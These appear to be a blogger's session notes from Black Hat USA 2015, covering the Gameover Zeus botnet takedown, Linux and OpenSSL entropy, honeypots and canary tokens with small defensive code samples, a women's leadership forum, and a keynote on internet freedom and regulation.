Speakers: Elliott Peterson is a Special Agent with the FBI in the Pittsburgh Field Office. Michael Sandee is a key member in the Fox-IT financial malware intelligence unit. Tillmann Werner is the Director of Technical Analysis at CrowdStrike Intelligence.

Gameover Zeus went after backend banking systems, very successfully - a botnet run by an organized crime gang. It was designed to make it impossible for the good guys to subvert it.

They estimate that the losses ranged from $10,000 to $6,900,000 per attack. The criminals had knowledge of international banking laws, leveraged international wires, and used DDoS attacks against the banks to distract and prevent the victims from identifying the fraud.

Dirt Jumper command and control was being used for the DDoS.

They saw the $6.9 million loss and informed the bank - but the bank could not find the loss. It took a long time to find, due to the DDoS. The FBI was finally able to track down who was receiving the funds in Switzerland and put a stop to it. Now the feds can prevent the transactions and even get the money back in the end.

The first Zeus came out in 2005 as a crimeware kit. The primary developer "abandoned" the project, and turned it into a private project in 2011.

The JabberZeus crew was using the kit malware, then moved to Zeus 2.1.0.x, which included support for a domain generation algorithm, regular expression support, and a file infector.  Then, in September, it was upgraded to Mapp 13, which includes peer-to-peer plus traditional comms via gameover2.php.  The focus was on corporate banking, and it would often drop in additional malware (like CryptoLocker).

The attack group seemed to have 5 years' experience, some as many as 10 - mainly from Russia and Ukraine, with two leaders, support staff, and 20 affiliates.

They had "bulletproof" hosting - exclusive servers together, virtual IP addresses, new address in 2 business days - very expensive!  Additionally, proxies all over the place - like in front of the peer-to-peer network.

The network was protected using a private RSA key.

The FBI, and their private-sector assistants, had to watch for traffic patterns and cookie theft/removal. For example, the malware could remove your existing cookie to force you to log in again, so that it could capture your password.  Once they got what they wanted, they would block (locally) access to the bank's website.

This wasn't just financial, but also political. There was espionage, targeting intelligence agencies, looking for things around the Crimea and Syrian conflicts.  Specifically looking for top secret documents, or agent names.


Why take control of the botnet? Because otherwise, if the feds' presence was detected, the command engine could shut down and destroy the rest of the botnet.

The botnet uses a basic p2p layer. Every infected machine stores a list of neighbor nodes, updated often, and peers talk directly to each other - getting weekly binary updates!

They had proxy nodes, which were announced by special messages to route C2 communication (stolen data, commands). Many nodes in the cluster are not publicly accessible, so there are proxy nodes that encapsulate traffic in HTTP so they can continue to communicate with infected machines behind a firewall.

The botnet was also configured to NOT accept unsolicited responses - they must match a request - so the feds (and friends) could not use a simple poisoning attack.

Goal: isolate bots, prevent normal operation, by turning the p2p network into a centralized network with the good guys at the controls (a sinkhole).

The good guys had to attack the proxy layer with a poisoning attack. Peers maintain a sorted list of up to 20 proxies, with regular checks of whether they're still active. They had to poison that list, and then make sure none of the other proxies replied any more.  They needed to work with ISPs to get access to some active proxies.

They needed to take over the command and control node first - that's where the commands came from.  Once they were in, they killed the old centralized servers (one in Canada and the other in Ukraine), took advantage of this to completely change the digraph, and essentially took down the botnet.

Needed to watch emails exchanged with "Business Club". Helpfully, "Business Club" kept ledgers!

The FBI needed to look at the seams to find out who these people were. For example, Bogachev used the same VPN servers to log into his personal/identifiable accounts as he used to control the botnet.

They are still looking for him. The FBI is offering $3 million for information leading to the capture of  Bogachev (showed us pictures of the guy - he likes his fancy boats).

Let me know if you get a piece of that bounty!

BHUSA15: Executive Women's Forum

Alta Associates hosted Black Hat's Executive Women's Forum! The discussion was led by none other than Joyce Brocaglia, CEO of Alta Associates and Founder of EWF.  This was a great opportunity to network with other women working in security and hear more about the programs of EWF (and lunch was good, too!)

EWF focuses on women making decisions in security and privacy, hosting an annual conference where women can spend time with other women working in security. Women who have attended past conferences note how awesome it is to be surrounded by so many intelligent and security focused ladies. It's very inspiring to see the success stories and see how they got there and learn about their road blocks.

In addition to the major EWF conferences (this year's is October 20-22, 2015 in Scottsdale, AZ), they do local events as well.

This year's conference theme is Big Data, Big Risks, Big Opportunities, with talks on negotiating, opportunities and innovation in healthcare big data, data sovereignty, global cybersecurity policy and government control, and the voice privacy conundrum. It also includes a themed dance party!

EWF provides mentors to help junior and middle managers get to the next step, as an inspirational conference is good for getting things started, but not for maintaining progress. They've got a program called The Leadership Journey - a year-long program! It covers things like establishing your leadership vision, optimizing emotional and social intelligence, managing stress and cultivating resilience, and work/life integration (because there is no balance).

The soft skills are actually the hard skills - lots of people are good at coding, but not any good at the truly hard stuff - the "soft skills".

This was followed by a fun Q&A with Theodora Titonis, Vice President of Mobile at Veracode.


Recommended reading: The Confidence Code.

BHUSA15: Understanding and Managing Entropy Usage

Bruce Potter is a director at KEYW Corporation and was previously the Chief Technologist and cofounder of Ponte Technologies. Sasha Wood is a Senior Software Engineer at KEYW Corporation, with ten years' experience in developing and assessing software systems, and researching classical and quantum computational complexity.

Their research was funded by Whitewood Encryption Systems, with help from great interns.

Their goal was to get a better understanding of how entropy is generated and consumed in the enterprise. There have been rants from Linus, but nobody seemed to be looking at the actual source code. They wanted to determine rates of entropy production on various systems, determine rates of entropy consumption for common operations, and determine the correlation between entropy demand and the supply of random data.  The theme: "No one really understands what's happening with entropy and random number generation."

What uses more entropy: generating an RSA 512-bit key, or a 1024-bit one? They both use the same amount! Surprisingly, running /bin/ls uses more entropy from the kernel than setting up a TLS connection!

How do we distinguish between entropy and random numbers? It's a bit of a state of mind; there are several ways to think about it.  Entropy is the uncertainty of an outcome. Randomness is about the quality of that uncertainty from a historical perspective.

Full entropy is 100% random. There are tests that measure entropy, but randomness either is or is not. Entropy has a quantity; randomness has a quality. Think about the simple coin flip: a regular person flipping a coin will have random output, but someone like the magicians Penn & Teller can control their flip, and the outcome is NOT random.

As long as we have great cryptographic primitives, the RNG will be excellent. In theory.

This is actually really hard to judge without analyzing the source code and doing actual testing. Documentation does not match what's actually in the source (common problem). This testing was done on Linux (note: I missed the version number).

On Linux, there are two PRNGs - one that feeds /dev/random and one that feeds /dev/urandom, but both leverage the same entropy source.

Entropy sources: time/date (very low entropy), Disk IO, Interrupts, and other SW things

There are hardware RNGs - like Ivy Bridge's, which uses thermal noise. There's the Entropy Key (shot noise, from a USB generator). Some places even use lava lamps! (Seriously.)

Linux maintains an entropy pool; data goes in and is then fed out to the PRNGs. There's a maximum amount in the pool, but if you don't have HW feeding it, it will never fill up.

Linux has a system call that will tell you how much entropy is in the pool.  But beware - don't check it with a script! You'll invoke ASLR, etc., which will consume entropy from the pool.
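
On Linux, the estimate is also exposed through procfs; reading it from an already-running process avoids spawning a new one (which, per the caveat above, would itself eat entropy). A minimal sketch:

    # Read the kernel's current entropy estimate (in bits).
    with open("/proc/sys/kernel/random/entropy_avail") as f:
        print("kernel entropy estimate:", f.read().strip(), "bits")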

The pools feeding /dev/random and /dev/urandom are generally close to zero; entropy is fed in from the main pool when necessary.

Unloaded VMs are only generating 2 bits of entropy per second. Bare metal is a bit faster. The more loaded the machine is, the more entropy you'll get.

For example, if you ping the machine every .001s, it will generate entropy at 13.92 bits/s, as compared to 2.4 bits/s on an unloaded system.

RDRAND is normally unavailable in a VM; however, even on bare metal, the kernel entropy estimation was not helped by RDRAND. It turns out that, due to recent concerns regarding RDRAND, even though RDRAND can be used to reseed the entropy pool, the entropy estimation is NOT increased by the kernel... on purpose.

VMs do get starved of entropy, but even bare metal systems aren't great.

Android devices did better than Linux boxes observed.

Oddly, the accelerometer on Androids is *not* used to feed the entropy pool, although it would be a good source of entropy.

/dev/random provides output that is roughly 1:1 bits of entropy to bits of random number; access depletes the kernel entropy estimation and will block if the pool is depleted.

/dev/urandom works differently: if you ask for 64 bits, it tries to get 128, and reduces the estimation accordingly. It will not reduce the entropy estimation if the pool is below 192 bits. Each read produces a hash which is immediately fed back into the pool.

get_random_bytes() is just a wrapper to access /dev/urandom.
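
The userspace view of the difference, as a minimal sketch (on an entropy-starved older kernel, the /dev/random read may block; the /dev/urandom read never does):

    import os

    key = os.urandom(16)              # reads /dev/urandom; never blocks
    with open("/dev/random", "rb") as f:
        nonce = f.read(16)            # may block until the pool refills
    print(key.hex(), nonce.hex())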

Here are some things that are not random: C's rand() (a linear congruential generator) - if you know two consecutive outputs, you know ALL the outputs.
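
Why an LCG is hopeless for crypto, in a few lines (the parameters below are the textbook ANSI C values - an assumption about any particular libc): each output is a fixed affine function of the previous state, so one observed output predicts everything after it.

    A, C, M = 1103515245, 12345, 2**31  # textbook LCG parameters

    def lcg(seed):
        state = seed
        while True:
            state = (A * state + C) % M
            yield state

    gen = lcg(42)
    observed  = next(gen)               # attacker sees one raw output
    predicted = (A * observed + C) % M  # ...and derives the next one
    assert predicted == next(gen)       # and every one after that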

Python's random.py implements a Mersenne Twister. Better than rand(), but still not suitable for crypto operations - you need roughly 624 consecutive outputs to recover the generator's state. So, better, but not great.

When Linux spawns processes, ASLR, KCMP, and other aspects of fork/copy_process() consume up to 256 bits of entropy each time you start a process.

This is not consistent, though, so more research is needed.
OpenSSL maintains its OWN PRNG that is seeded by data from the kernel. This PRNG is pulled from for all cryptographic operations, including generating long-term keys, generating ephemeral and session keys, and generating nonces.

OpenSSL only seeds its internal PRNG once per runtime. That's no problem for things like generating RSA 1024-bit keys, but it's a different situation for long-running daemons that link to OpenSSL... like webservers. An Apache PFS connection requires 300-800 bits of random numbers; if your application runs for a long time, you will be pulling this data from a source that is never reseeded.

OpenSSL pulls its seed from /dev/urandom by default (and stirs in other data that is basically knowable). OpenSSL does NOT check the quality of the entropy when it polls /dev/urandom.

mod_ssl's attempt to generate entropy is not very sophisticated. On every request, it stirs in: date/time (4 bytes), the PID, and 256 bytes off the stack.  Date/time is low resolution and guessable, the PID is a limited search space, and it always looks at the same place on the stack.

mod_SSL is trying really hard, but not really accomplishing much.

How much entropy goes into each random byte?  It depends...

The researchers tested various common actions in OpenSSL. Different operations required different amounts of entropy. When creating keys, you need to find big prime numbers - there's a lot of testing that goes on to find a prime.

Attacks on PRNGs come under three umbrellas: control/knowledge of "enough" entropy sources (like RDRAND), knowledge of the internal state of the PRNG, and analysis of the PRNG traffic.

By default, the Linux kernel pulls from a variety of sources to create entropy pool, so difficult to control them all. Knowledge of the state of the PRNG is very complex, but not impossible to understand.

The caveat: all this assumes PRNGs are being seeded correctly - and analysis is showing this is not the case.  So you can follow NIST's guidance on correctness and still get this wrong.

The researchers created a WES Entropy Client as a solution to the wild west of entropy generation and distribution. Initial release is for OpenSSL.  Client allows users to select sources of entropy, how to use each source, which PRNG to use, etc.

Currently available at http://whitewoodencryption.com/

Client is under active development, looking for feedback.


BHUSA15: Bring Back the Honey Pots

Haroon Meer is the founder of Thinkst, and Marco Slaviero is the lead researcher at Thinkst.

Honey pots are not a new concept - there are many previous talks on them. This is basic deception in warfare, another old concept. Check out: Deception for the Cyber Defender: To Err is Human; to Deceive, Divine.

Honey pots really got started in 1989 and 1991. Bill Cheswick's paper wrote about effectively tracking down an attacker who had broken into his network - really one of the first deep-dive documents on this. Next was The Cuckoo's Egg by Clifford Stoll (wait, also 1989?), which hit on the themes of vulnerability disclosure ethics and what the NSA is up to. Mr. Stoll also talked about the concept of honey pots.

In 2000, Lance Spitzner launched the Honeynet Project, where we all gained valuable information from the "Know Your Enemy" series.

Think about big recent attacks like the one at Target, where the hackers lurked for months before actively attacking. How could that be, if we've had the concept of honey pots for years to help folks discover when they are being attacked?

Looking at the traffic on the honey pot mailing list: very active in 2003, nearly dying off starting in 2007. Honey pots are just not sexy - how do you demo one?  "Um, it only makes noise when there's a problem, so it mostly does... nothing." It's easier to sell other technology.

Honey pots have traditionally been pitched badly. They are overrepresented in academic work, and don't seem like an industry solution.

Studying the attack after it happened doesn't seem interesting or relevant. Honey pots were looking for what was happening, but not focused on finding new attacks.

We need these, though. We can't wait to find out that our network has been exploited when the press contacts us. Verizon noted that 95% (?) of companies only find out about attacks when a third party tells them. That's simply not acceptable.

As a defender, you MUST defend ALL the time. Attackers can come and go.

There are a lot of arguments against honey pots:

Isn't this just an arms race?  No - an arms race is like what we saw between the US and USSR, not what we're seeing today between the US and North Korea. You have to be at the table, making the attacker work for it.

Will honey pots just introduce new risk to our organization? No, you can run python on a hardened server, support only minimal protocols. If you get even just one alert, you're better off than you were yesterday.

And, really, come on - we know you have an NT4 server floating around still on your network.  You've already got the risk there, but this is something that you can manage.

"These are painful to deploy! I already have to manage so many things!"  The speakers have solved this with Open Canary (https://canary.tools/) which can deploy in 3 minutes.

The speakers introduced their Open Canary project:
  • Mixed (low + high + ?) interaction honeypot
  • written in python
  • produces high quality signals
  • it's a sensor
  • trivial to deploy and update
OpenCanary can be configured to send you lots, or a few alerts - you can control the noise level.

It watches various protocols - looking for login attempts - including NTP, SIP, and Samba.

As the name implies, the code is open source. You can configure and deploy multiple feeds across the network.

You do have to think about discoverability. You want to make sure the honey pots are referenced (like in a naming service), and also deploy multiple honey pots so they are more likely to be found.


Of course, there is a concern that hackers might be able to fingerprint the honey pot.  The speakers think this is misguided effort: there are ways to detect any honey pot software running on a system - look for how the system is different than it should be. Is it running a strange service or kernel module?  But we need to draw the distinction: we should not confuse what methods are successful in a lab versus what works in the real world.

Canary tokens are not a new concept - see Spafford & Kim (1994) and Spitzner (2003). Map makers have long done the same thing, putting fake cities or points of interest on a map so they can tell when someone has copied it.

Canary tokens are simple unique tags that can be embedded in a wide variety of places - even in a DNS channel.
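
As a sketch of the DNS-channel idea (again my illustration, with an invented zone name; a real server would also answer the query, and binding port 53 needs privileges): mint a unique hostname under a zone you control, hide it in bait, and alert whenever anything resolves it. DNS is a great channel because even machines with no direct Internet access can usually still resolve names.

```python
# A minimal sketch of a DNS canary token (an illustration, not the
# real canarytokens service): a unique hostname that nothing should
# ever resolve unless someone has found the bait it's hidden in.
import socket
import uuid

ZONE = "canary.example.internal"       # hypothetical zone we control
TOKEN = f"{uuid.uuid4().hex}.{ZONE}"   # unique name to plant as bait
print(f"Embed this hostname in a config file, script, etc.: {TOKEN}")

def question_name(packet: bytes) -> str:
    """Extract the queried name from a raw DNS query packet."""
    i, labels = 12, []                 # skip the 12-byte DNS header
    while i < len(packet) and packet[i] != 0:
        n = packet[i]
        labels.append(packet[i + 1:i + 1 + n].decode("ascii", "replace"))
        i += 1 + n
    return ".".join(labels)

# Run this where the zone's queries arrive (port 53 requires root).
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.bind(("0.0.0.0", 53))
while True:
    data, addr = sock.recvfrom(512)
    name = question_name(data)
    if name.endswith(ZONE):
        # A real server would answer the query too; alerting is the point.
        print(f"ALERT: {addr[0]} just resolved {name}")
```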

You can learn more at canarytokens.com

How can tokens help us spot attackers on the network? You can watch a particular README file: when it gets read, the canary token triggers and sends an alert.
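
One toy way to wire that up (not the actual canarytokens.com machinery - the hostname and port are placeholders, and this variant fires when a URL planted in the README is fetched, rather than on the file read itself):

```python
# A toy document token (my illustration, not the canarytokens.com
# implementation): plant a unique URL in the bait file, and alert if
# that URL is ever fetched. Host and port below are placeholders.
import http.server
import uuid

TOKEN = uuid.uuid4().hex
print(f"Plant this in the README: http://canary.example.internal:8080/{TOKEN}")

class TokenHandler(http.server.BaseHTTPRequestHandler):
    def do_GET(self):
        if self.path == f"/{TOKEN}":
            print(f"ALERT: token fetched by {self.client_address[0]} "
                  f"(User-Agent: {self.headers.get('User-Agent')})")
        self.send_response(404)  # look boring no matter what
        self.end_headers()

    def log_message(self, *args):
        pass  # stay quiet except for real alerts

if __name__ == "__main__":
    http.server.HTTPServer(("", 8080), TokenHandler).serve_forever()
```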

You can even deploy canary tokens into databases - you can tell if someone is querying a table or a view. Same with PDF files.

Interesting use of Bing ads, etc. Cool talk!

(sorry if these notes are spotty, the speakers flashed through their slides REALLY fast, it was hard to catch everything).

BHUSA15: The Lifecycle of a Revolution

Jennifer Granick, Director of Civil Liberties at the Stanford Center for Internet and Society.

Jennifer and Jeff Moss (aka Dark Tangent) met at DefCon III in 1995 - they immediately connected, and she has been the go-to lawyer for hackers ever since.


We're seeing an Internet that is no longer dominated by the US. This is important, because governments that don't have a Bill of Rights will get in on making the rules that regulate our Internet. Where will we be in 20 years? Will you know who is making the decisions? Computers will be deciding whether you get a loan, where your car drives, etc. There will be mistakes, but as long as they are edge cases, that's okay.


Technology was supposed to help us overturn oppressive regimes, but instead we're seeing the opposite happen. The repressors are centralizing security, creating chokepoints where regulation can happen. The backdoors and restrictions will be imposed by elites and governments with local interests - not global ones.
Who is responsible for deciding who gets security, who gets access to what things on the Internet?

She was inspired by Steven Levy's book, Hackers, which espoused the freedom and decentralization of information. This empowered people to make their own decisions about what was right and wrong. The global network would allow us to communicate with anyone, anywhere, at any time.

Jennifer attended New College - where students were responsible for their own education. They wanted information to be free, and they wanted to use their freedom of thought to change the world.

She started her career as a lawyer with a deep love of technology, and was upset seeing hackers getting prosecuted for things she considered “pretty neat tricks”. She met a prisoner who was at risk of losing his “time credit” after it was discovered he was hacking the pay phone to get himself and his friends free phone calls. She wanted this to stop. That was in 1995, and she started paying more attention to what was happening.

Meet "Cyberporn" - a Time Magazine expose about what you could find on the Internet. Congress wanted this to stop (nothing gets government more excited than porn), so they created the Communications Decency Act (CDA). Of course, doing so required assuming that there were no First Amendment rights on the Internet.

John Perry Barlow, founder of the EFF and lyricist for the Grateful Dead, wrote:

Governments of the Industrial World, you weary giants of flesh and steel, I come from Cyberspace, the new home of Mind. On behalf of the future, I ask you of the past to leave us alone. You are not welcome among us. You have no sovereignty where we gather.

The Supreme Court, fortunately, struck down most of the provisions of the CDA - except the one provision specifying that providers do not have to act as the police.

The Internet was supposed to make us more free - but that's no longer what's happening out there.

Race, gender, and class discrimination seem resistant to change on the Internet. While Jennifer has always felt welcome, there is too much evidence to ignore. Look at our big tech companies, with 17, 15, or 10% female engineers.

How is that equality?

There are talented people on all parts of the autism spectrum, with different college (or no college) backgrounds, and at any age – from the very young to the elderly.  Given that, could we lead in equality?

What about Freedom to Tinker?

For example, Mike Lynn was coming to Black Hat to present on new vulnerabilities in Cisco routers. His employer, ISS (Internet Security Systems), and Cisco decided he should not give the talk, and pressured the Black Hat conference into removing the pages referencing Mike's talk from the program and redoing the CD-ROMs of the conference proceedings. Jennifer was his lawyer. Mike gave the talk anyway - but the first thing he did in his talk was resign from ISS.
 
What looks more like censorship than ripping pages out of a book?

Jennifer also represented Aaron Swartz, who ended up killing himself while being prosecuted.

How do we stop this?

Congress has to stop the "tough on cybercrime" hand waving and actually do something about cyber security. They have created big prison sentences for violations, but when another country like China is behind an attack, nothing is done - China does not go to jail. It's the little guys who are really hurt by the DMCA and the CFAA. We need to get rid of them.

Already now, algorithms are making decisions about our lives, our money, our jobs - and we do not understand these algorithms. How do we take advantage of AI and machine learning without ending up completely out of control?

Who is responsible when software fails?  For the most part, nobody. People are sick and tired of this.

Think about this: what happens when your self-driving car crashes? When your Internet-connected toaster catches fire? When hackers can control your car remotely through its OnStar device?

We will end up with software liability. Once we are suing Tesla and GM for their software issues, it will be a small step to start suing software companies.

Jennifer recommends reading The Master Switch by Tim Wu, which studies the cycle of major technologies: "History shows a typical progression of information technologies: from somebody's hobby to somebody's industry; from jury-rigged contraption to slick production marvel; from a freely accessible channel to one strictly controlled by a single corporation or cartel - from open to closed system."

If we don’t do things differently, the Internet will end up like TV, strongly regulated.

Sadly, there are people on the Internet who suck - 4chan, Nazis, jihadists. Freedom of speech allows for them; if you try to regulate them away, you will end up impacting everyone. We must tread carefully.

Jennifer asks: who has ever had a blog? Lots of hands go up. Who still blogs? A few hands go up. She noted, "I used to blog; I don't anymore - I use the centralized service, Facebook." Nobody (well, except people in this room) still runs their own mail server - they all use gmail.com. We are giving up control, and we are doing it to ourselves.

When we talk about the “cloud” - is it all happy and free? No, it is actually controlled by a small handful of companies, subject to government regulations (US or otherwise). This creates a centralized point for control and eavesdropping.

The law is not protecting us here - in fact, quite the opposite. For example, we have laws that allow surveillance of foreigners, but loopholes in those laws are being used to spy on US citizens. Laws are being passed to give corporations protection from lawsuits if they turn over information to the US government.

There is not a lot of case law here, oddly, considering the Internet has been around for a while.

When there is no warrant requirement, searches can be massive and arbitrary.

The myth is that security and privacy are opposites. Not true! Putting a lock on a cockpit door provides security without costing anyone privacy. And a gay man in another country needs to keep that information private in order to be secure in his own health and happiness.

The current situation is leading to security haves and have-nots. It's increasingly about power - and once that happens, the people who lose will be minorities (religious, ethnic, etc.), the very people who need security most! In the US we have the Bill of Rights, so we don't worry enough about this - but other countries do not have those protections. We need to be the leader in protecting the world, and we're not doing that.

We're already scanning for terrorist threats, and it's now broadening into monitoring people who seem to be "becoming radicalized." What does that mean? There is no agreement - not even between the FBI and psychologists - on what "becoming radicalized" means. So now more people are being watched.

People don't even realize what the Internet is. In a national survey, more people reported using Facebook than reported using the Internet. Of course, Facebook is on the Internet - but it is NOT the Internet. So who is correct there? Facebook decides what to show you based on some algorithm; the freedom is not there... The further this goes, the less we will know about the world.

We need to start thinking about decentralizing technology again. We need end-to-end encryption. We need to be afraid of the right things - people are terrible at assessing risk. People are more afraid of sharks than of cows, but EIGHT times more people die at the hooves of cows every year than are killed by sharks. (note: WHAT?!?! Now I'm more afraid of cows - I knew they were after me!)

We can use law to provide safeguards where technology doesn’t, but we don’t. Congress is simply not protecting our privacy. We need to push them.

We need to get ready to smash it apart and make something new and better.